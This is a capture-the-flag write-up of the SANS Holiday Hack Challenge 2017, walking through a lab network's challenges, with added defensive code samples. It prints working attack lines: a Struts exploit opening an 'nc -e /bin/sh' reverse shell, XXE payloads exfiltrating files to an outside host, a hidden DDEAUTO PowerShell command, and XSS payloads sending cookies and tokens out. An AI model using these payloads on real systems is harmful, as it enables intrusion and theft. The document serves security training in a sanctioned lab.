SANS Holiday Hack Challenge - Part 2

Part two of security researcher Roy Shoemake's SANS Holiday Hack Challenge, where we find out who the villains are and what their motive is. Let's take a closer look at the primary technical challenges and how to overcome them.

Main Technical Challenges

Question #1 – What is the title of that page?

Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

Answer: About This Book

This is not a technical challenge but a snowball challenge: to unlock this page of the book I had to redirect a snowball over the Great Book Page.

Note: The Great Book Page #5 is also in a separate snowball challenge. All other pages are found in the technical challenges.

Question #2 – Find the Great Book Page Topic and Alabaster’s Password

Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com.

What is the topic of The Great Book page available in the web root of the server?

What is Alabaster Snowball’s password?

Answer 1: On the Topic of Flying Animals

Solution

Upon visiting https://l2s.northpolechristmastown.com I view the HTML source code for any clues. I notice a hidden link to http://dev.northpolechristmastown.com, as the screenshot below demonstrates.


Visiting the dev link I see another clue in the source indicating the site might be vulnerable to Apache Struts.


After testing a few different exploits for Apache Struts I found one that works for CVE-2017-9805. On a remote server, I start a listener on port 80, as the below screenshot shows.


I use a Python script [1] and issue the following command to establish my reverse shell:

sans-struts.py --exploit --url 'https://dev.northpolechristmastown.com/orders/4' -c 'nc -e /bin/sh 159.89.40.52 8080'

To upgrade the reverse shell to a usable TTY I run the following Python one-liner:

python -c 'import pty;pty.spawn("/bin/bash")'

I start enumerating the Letters to Santa server and in the html directory I find a PDF called GreatBookPage2.pdf.

alabaster_snowball@hhc17-apache-struts1:/var/www/html$ ls | grep Great
GreatBookPage2.pdf

Answer 2: stream_unhappy_buy_loss

Solution

After enumerating /var/www/html I knew there might be some information in the directory serving the Apache Struts content, which was located under /opt/apache-tomcat.

I do a quick grep to see whether I can locate any passwords for alabaster_snowball, using the following commands:

grep -nr 'password*' /opt
grep -nr 'alabaster_snowball*' /opt

The grep returned a username and password in the OrderMySql.class file located at:

cat /opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/

<snip>
final String host = "localhost";
final String username = "alabaster_snowball";
final String password = "stream_unhappy_buy_loss";
String connectionURL = "jdbc:mysql://" + host + ":3306/db?user=;password=";
Connection connection = null;
Statement statement = null;
<snip>

Success! I can now use the information to log directly into the server with SSH.

Note: For most of the challenges I use the following SSH command to set up a SOCKS proxy. This lets me use proxychains or other tools to connect directly to the 10.142.0.0/24 network.

ssh -D localhost:8082 [email protected]

Question #3 – What is the file server share name?

The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server.

What is the file server share name?

Answer: FileStor

Solution

I know the primary objective is to find an SMB server. Using nmap I scan the 10.142.0.0/24 network for port 445 with the following command.

nmap -Pn -p445 10.142.0.0/24

The scan results show one IP with port 445 open.

Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)
Host is up (0.0012s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

I use the following command to enumerate the SMB share:

smbmap -r -u alabaster_snowball -p stream_unhappy_buy_loss -d workgroup -H localhost

From this, I can determine that the file share name is FileStor and that alabaster_snowball has read access to files under this share.


I use smbclient to connect to and interact with the FileStor share with the following command:

smbclient //localhost/FileStor -U alabaster_snowball

This gives me a command-line prompt, from which I download all the files with the command:

mget *

Now I have all the files on my local machine.

Question #4 – What can you learn from The Great Book page in the email server?

Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com.

What can you learn from The Great Book page found in an e-mail on that server?

Answer: That the Lollipop Guild engages in offensive operations against the North Pole.

Location of the book: http://10.142.0.5/attachments/GreatBookPage4_893jt91md2.pdf

Solution

I use the following payload to bypass authentication. This works because the application treats the first 16 bytes of the ciphertext as the initialization vector (IV) and strips them before decrypting. I supply a ciphertext value that, once the IV is stripped, decrypts to an empty value, which matches the empty plaintext field in the cookie.

EWA={"name":"[email protected]","plaintext":"","ciphertext":"bb8dacc4678800915189af"}
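
The flaw in that check, modelled in Python as an added example (not code from the challenge or the write-up): the vulnerable version strips a 16-byte IV and compares whatever decrypts against the client-supplied plaintext field, so a 16-byte blob passes trivially; the hardened version authenticates the blob, enforces a minimum length and takes the session content only from the decrypted bytes. A SHA-256 keystream stands in for the app's AES so the block runs with the standard library only; the key and the name field are constructed.

```python
import base64
import binascii
import hashlib
import hmac
import secrets

IV_LEN = 16   # the app treated the first 16 bytes of the blob as the IV
TAG_LEN = 32  # HMAC-SHA256 tag appended by the hardened version

# Cookie from the write-up; the name field is a constructed placeholder.
FORGED_COOKIE = {"name": "user@example.com", "plaintext": "",
                 "ciphertext": "bb8dacc4678800915189af"}  # 22 chars = 16 bytes

def _xor_stream(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Stand-in for the app's AES-CBC: a SHA-256 keystream XORed over data.
    It keeps the property that matters here: zero bytes in, zero bytes out."""
    stream = b""
    for ctr in range((len(data) + 31) // 32):
        stream += hashlib.sha256(key + iv + ctr.to_bytes(4, "big")).digest()
    return bytes(a ^ b for a, b in zip(data, stream))

def vulnerable_check(key: bytes, cookie: dict) -> bool:
    """Model of the flawed check: decrypt everything after the IV and compare
    it with the plaintext field the client sent."""
    b64 = cookie["ciphertext"]
    blob = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # lenient decoding
    iv, ct = blob[:IV_LEN], blob[IV_LEN:]
    # BUG: a 16-byte blob leaves ct empty, "" == "" and the login succeeds
    return _xor_stream(key, iv, ct).decode("utf-8", "replace") == cookie["plaintext"]

def seal(key: bytes, session: bytes) -> str:
    """Hardened issuance: random IV, then encrypt-then-MAC over iv||ct."""
    iv = secrets.token_bytes(IV_LEN)
    ct = _xor_stream(key, iv, session)
    tag = hmac.new(key, iv + ct, hashlib.sha256).digest()
    return base64.b64encode(iv + ct + tag).decode()

def open_sealed(key: bytes, token: str):
    """Hardened check: strict decoding, minimum length, constant-time tag check."""
    try:
        blob = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(blob) < IV_LEN + 1 + TAG_LEN:  # must carry at least one byte of ct
        return None
    iv, ct, tag = blob[:IV_LEN], blob[IV_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return _xor_stream(key, iv, ct)  # session data comes only from here
```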


Question #5 – Infractions, threat moles, who is throwing snowballs

How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List?

What are the names of at least six insider threat moles?

Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

Answer 1: Looks like four infractions

How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List?

It appears there must be four infractions to be marked on the naughty list. This was determined by reviewing people who are on the nice list versus those on the naughty list.

Infractions were determined by visiting https://nppd.northpolechristmastown.com/infractions. A CSV file obtained earlier from the FileStor share lists names and whether each is naughty or nice.

Answer 2: See the list below

What are the names of at least six insider threat moles?

Two of the insider threat moles are:

Boq Questrian
Bini Aru

These two moles were determined from the Munchkin Mole Advisory found in the FileStor. Using the information from these two confirmed moles I cross-referenced their infractions with others who are on the naughty list. I determined four additional moles from the information.

Erin Tran
Wesley Morton
Nina Fitzgerald
Lance Montoya

Answer 3: Abominable Snow Monster

Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

The answer was obtained from a chat message as shown in the screenshot below. The chat was found playing the snowball challenges.


Question #6 – What is the title of The Great Book page?

The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com.

Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

Answer: The dread inter-dimensional tornadoes

Solution

An earlier Nmap scan indicated that 10.142.0.13 is the eaas.northpolechristmastown.com server.

Nmap scan report for eaas.northpolechristmastown.com (10.142.0.13)
Host is up (0.00040s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
5985/tcp open wsman
5986/tcp open wsmans

Upon visiting the site, I see right away that it parses XML files: there is an upload function that accepts and parses .xml files.


I create a file named file.xml with the following contents to confirm the vulnerability:

<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "http://159.203.168.192/test.txt">]><r>&sp;</r>

On the remote server, I use nc to listen on port 80.


I see the GET request for /test.txt and this confirms the Elf server is vulnerable to out-of-band XXE attacks [2].

I customize the payload to gather some information about the server. From the original question I know the file of interest is located at C:\greatbook.txt. I create a file named oob.dtd with the following contents and host it on my remote server:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://159.203.168.192/?collect=%file;'>">%all;

On my local machine, I modify the original file.xml to look like:

<?xml version="1.0" ?><!DOCTYPE data [<!ENTITY % file SYSTEM "file:///c:/greatbook.txt"><!ENTITY % dtd SYSTEM "http://159.203.168.192/oob.dtd">%dtd;]><data>&send;</data>

I monitor the Apache Logs on the remote server and see a successful 200 response and now I have access to greatbook6.pdf.

35.185.118.225 - - [17/Dec/2017:15:44:13 +0000] "GET /oob.dtd HTTP/1.1" 200 289 "-" "-"
35.185.118.225 - - [17/Dec/2017:15:44:13 +0000] "GET /?collect=http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1" 200 11576 "-" "-"
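
As an added example (not the EaaS code or the write-up's), the parser configuration that would have blocked this probe: a standard-library Python handler that refuses any DOCTYPE and any external or parameter entity before anything is fetched. The callback host in the probe is replaced by a placeholder and both inputs are constructed.

```python
import xml.parsers.expat as expat

class XmlRejected(ValueError):
    """Raised when an upload carries a DOCTYPE or any external entity."""

def parse_elf_upload(data: bytes) -> dict:
    """Parse an uploaded XML document with entity expansion switched off.
    Returns the root element name and text; raises XmlRejected on a DOCTYPE
    or on any external/parameter entity before anything is fetched."""
    parser = expat.ParserCreate()
    # Never load or expand parameter entities (the %file; / %dtd; construct)
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise XmlRejected(f"DOCTYPE '{name}' not allowed in uploads")

    def reject_external(context, base, sysid, pubid):
        raise XmlRejected(f"external entity blocked: {sysid}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external
    root, text = [], []
    parser.StartElementHandler = lambda name, attrs: root.append(name) if not root else None
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return {"root": root[0] if root else None, "text": "".join(text).strip()}

def check_upload(data: bytes) -> tuple:
    """Gate for the upload handler: (accepted, parsed document or reason)."""
    try:
        return True, parse_elf_upload(data)
    except XmlRejected as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"

# Constructed inputs: a benign upload, and the out-of-band probe shape from the
# write-up with the callback host replaced by a placeholder.
BENIGN = b'<?xml version="1.0"?><elf><name>Bushy Evergreen</name></elf>'
PROBE = (b'<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY >'
         b'<!ENTITY sp SYSTEM "http://attacker.example/test.txt">]><r>&sp;</r>')
```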

Question #7: What does the Great Book page describe?

Like any other complex SCADA system, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

Answer: Explaining the Great Schism and the witches remaining in Oz.

The earlier e-mail server contained clues indicating that Alabaster Snowball is desperately looking for a Gingerbread Cookie Recipe. He was so desperate that he mentioned he would open any .docx with the words Gingerbread Cookie Recipe in it.

The objective is to obtain the GreatBookPage7.pdf so I opted for a simple PowerShell command using DDEAUTO in a .docx file [3].

The command simply copies GreatBookPage7.pdf over to inetpub\wwwroot so I can grab it through IIS.

DDEAUTO c:\Windows\System32\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(copy-item -path c:\GreatBookPage7.pdf -destination c:\inetpub\wwwroot\h9t3ibuw9h.pdf);powershell -e $e "
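
An added detection example (not from the write-up): scanning the XML parts of a .docx for DDE and DDEAUTO field codes, joining split instrText runs because Word can fragment a single field code across several runs. The .docx container and its field text are constructed for the test.

```python
import io
import re
import zipfile

# Field codes in a .docx live in word/*.xml, either as <w:fldSimple w:instr="...">
# or as <w:instrText> runs. Word may split one code across runs, so all
# instrText content in a part is joined before matching.
INSTR_TEXT = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
FLD_SIMPLE = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"')
DDE_FIELD = re.compile(r"\b(DDEAUTO|DDE)\b", re.I)

def find_dde_fields(docx_bytes: bytes) -> list:
    """Return '<part>: <field code>' for every DDE/DDEAUTO field in a .docx."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not (part.startswith("word/") and part.endswith(".xml")):
                continue
            xml = z.read(part).decode("utf-8", "replace")
            codes = ["".join(INSTR_TEXT.findall(xml))] + FLD_SIMPLE.findall(xml)
            for code in codes:
                if DDE_FIELD.search(code):
                    findings.append(f"{part}: {code.strip()[:80]}")
    return findings

def build_docx(document_xml: str) -> bytes:
    """Constructed minimal .docx container for testing (not a full Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()

# Constructed samples: a DDEAUTO field split across two runs, and a benign
# page-number field.
DDE_SAMPLE = build_docx(
    '<w:document><w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText>DDE</w:instrText></w:r>'
    '<w:r><w:instrText>AUTO c:\\Windows\\System32\\cmd.exe "/k echo dde-test"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
BENIGN_SAMPLE = build_docx(
    '<w:document><w:body><w:p><w:fldSimple w:instr=" PAGE "/></w:p></w:body></w:document>')
```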

Question #8: Who wrote the letter?

Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

Answer: The Wizard

For this challenge, the webpage prompts for a username and password.


There is also a page to contact support for a lost password reset.


It looks like the ticket support request form is vulnerable to stored XSS. I use the following payload to grab the session cookie:

#"><img src=M onerror=alert(window.location='http://138.197.15.243/?cookie='+document.cookie);>

It returned the following session cookie:

35.196.239.128 - - [17/Dec/2017 20:09:18] "GET /?cookie=SESSION=hxxer50N2e1C2AFt5X06 HTTP/1.1" 200 -

I tried using the session cookie to gain access but had no luck. So, in reviewing the source, I found the following code referencing a token stored in localStorage [4]:

if (!document.cookie) {
    window.location.href = '/';
} else {
    token = localStorage.getItem("np-auth");
    if (token) {
        $.post("/login", { auth_token: token }).done(function (result) {
            if (result.bool) {
                window.location.href = result.link;
            }
        });
    }
}

I changed my XSS payload to grab the JSON Web Token.

#"><img src=M onerror=alert(window.location='http://165.227.219.108/?cookie='+localStorage.getItem("np-auth"));>

Now I have the Web Token.

35.196.239.128 - - [20/Dec/2017 21:20:31] "GET /?cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1" 200 -

After decoding the base64 value I get:

{“alg”:”HS256″,”typ”:”JWT”}.{“dept”:”Engineering”,”ou”:”elf”,”expires”:”2017-08-16 12:00:47.248093+00:00″,”uid”:”alabaster.snowball”}.3¶x#p­­kxHl¬ƒ¹¢6V9_⶙ —¡VB=‡N$r6I

I try changing the "alg" to "None" and removing the signature, leaving the trailing dot, but the application didn't accept it. I also try cracking the JWT, but that didn't return anything after trying some popular wordlists. I go back to my notes.

In my earlier enumeration, I found something else of interest under the /dev directory: an LDIF template. I also knew from an earlier Nmap scan that port 389 was open.

#LDAP LDIF TEMPLATE
dn: dc=com
dc: com
objectClass: dcObject

dn: dc=northpolechristmastown,dc=com
dc: northpolechristmastown
objectClass: dcObject
objectClass: organization

dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human

dn: ou=elf,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: elf

dn: ou=reindeer,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: reindeer

dn: cn= ,ou= ,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
cn:
sn:
gn:
profilePath: /path/to/users/profile/image
uid:
ou:
department:
mail:
telephoneNumber:
street:
postOfficeBox:
postalCode:
postalAddress:
st:
l:
c:
facsimileTelephoneNumber:
description:
userPassword:

I was able to dump the database using the following command:

proxychains ldapsearch -h 10.142.0.6 -p 389 -x -b "dc=northpolechristmastown,dc=com"

Success! I was able to use Santa's login to access the login page after decoding the base64 userPassword and cracking the MD5 value. It turns out that I didn't need the JWT or cookie after all.

<snip>
# santa, human, northpolechristmastown.com
dn: cn=santa,ou=human,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
c: US
cn: santa
department: administrators
description: A round, white-bearded, jolly old man in a red suit, who lives at the North Pole, makes toys for children, and distributes gifts at Christmastime. AKA - The Boss!
facsimileTelephoneNumber: 123-456-8893
gn: Santa
l: North Pole
mail: [email protected]
ou: human
postOfficeBox: 126
postalAddress: Candy Street
postalCode: 543210
profilePath: /img/elves/santa.png
sn: Claus
st: AK
street: Santa Claus Lane
telephoneNumber: 123-456-7893
uid: santa.claus
userPassword:: Y2RhYmViOTZiNTA4ZjI1Zjk3YWIwZjE2MmVhYzVhMDQ=
<snip>

Base64 decoded value (MD5): cdabeb96b508f25f97ab0f162eac5a04

Cracked: 1iwantacookie

Once I accessed the web application, I located the letter to Santa under Account > Santa Panel.


Question #9: Who is the villain and what’s the motive?

Which character is ultimately the villain causing the giant snowball problem? What is the villain's motive?

Answer: Glinda, the Good Witch – Motive is money.

According to the last chat message (as in the screenshot) the ultimate villain is Glinda, the Good Witch. Her primary goal is to make money by causing a war between the North Pole and Oz. The chat was found playing the snowball challenges.


References

[1] CVE-2017-9805 Script – https://github.com/mazen160/struts-pwn
[2] https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/
[3] https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
[4] https://developer.mozilla.org/en-US/docs/Web/API/Storage/LocalStorage

The beautiful artwork used to head this article is called 'Cozy Igloo' and was created by Runar Finanger.